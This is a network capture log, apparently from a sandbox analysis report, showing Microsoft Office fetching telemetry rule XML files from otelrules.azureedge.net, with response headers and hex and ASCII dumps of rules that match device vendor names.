                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:59 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                            x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032659Z-178bfbc474bmqmgjhC1NYCy16c00000002e000000000e7x4
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            20192.168.2.44984013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:59 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                            x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032659Z-178bfbc474b7cbwqhC1NYC8z4n00000002d0000000001pxw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            21192.168.2.44983813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:26:59 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                            x-ms-request-id: 6b6b0dda-801e-0083-096a-3cf0ae000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032659Z-174c587ffdfldtt2hC1TEBwv9c00000000t000000000316k
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:26:59 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            22192.168.2.44984613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                            x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032701Z-174c587ffdf8lw6dhC1TEBkgs800000000tg00000000k4td
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            23192.168.2.44984713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                            x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032701Z-178bfbc474bpscmfhC1NYCfc2c00000000yg00000000g0xq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            24192.168.2.44984813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                            x-ms-request-id: ce5ebd39-a01e-0053-183c-3c8603000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032701Z-15b8b599d885v8r9hC1TEB104g00000000x000000000acme
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            25192.168.2.44984913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                            x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032701Z-178bfbc474bp8mkvhC1NYCzqnn0000000290000000006ygz
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            26192.168.2.44985013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:01 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                            x-ms-request-id: 6ebbc676-001e-005a-784b-3cc3d0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032701Z-15b8b599d88tmlzshC1TEB4xpn00000000s000000000a7sp
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:01 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            27192.168.2.44985413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                            x-ms-request-id: 5235ff2f-501e-008f-1c4e-3c9054000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032703Z-178bfbc474b7cbwqhC1NYC8z4n00000002ag000000008vrr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            28192.168.2.44985513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:03 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:03 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                            x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032703Z-174c587ffdfdwxdvhC1TEB1c4n00000000sg00000000cune
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
